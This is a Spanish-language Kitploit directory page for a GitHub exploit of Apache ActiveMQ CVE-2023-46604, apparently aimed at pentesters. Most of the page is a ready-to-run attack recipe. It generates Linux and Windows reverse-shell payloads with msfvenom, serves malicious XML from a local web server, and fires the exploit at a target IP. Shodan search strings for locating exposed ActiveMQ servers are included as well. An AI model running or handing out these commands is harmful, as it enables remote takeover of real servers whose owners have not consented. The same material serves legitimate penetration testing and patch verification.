Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ — Logrando un exploit de shell inversa para Apache ActiveMQ (CVE_2023-46604) | Kitploit
Herramientas/GitHubGitHub/saumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubsaumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Logrando un exploit de shell inversa para Apache ActiveMQ (CVE_2023-46604)

Ver Repositorio
1264053hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Este exploit se basa en el trabajo fundacional disponible en https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). Hemos desarrollado más a fondo la técnica para lograr una reverse shell utilizando Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Uso:

Importante: cambia manualmente la dirección IP (0.0.0.0 en la línea 11) en los archivos XML por la dirección IP donde se generará el payload. Si sigues los comandos a continuación, esa será la IP de tu listener. Además, {IP_Of_Hosted_XML_File} será la IP de tu listener.

Para objetivos Linux/Unix

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

Para objetivos Windows

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

imagen

Dork de Shodan:

  • product:"ActiveMQ OpenWire Transport"
  • imagen
  • product:"ActiveMQ OpenWire Transport" port:61616
  • imagen

Trabajo original:

  • https://github.com/X1r0z/ActiveMQ-RCE

Para más información:

  • https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
  • https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
  • https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

Un agradecimiento especial a https://github.com/Anon4mous por apoyarme activamente.

Descargar herramienta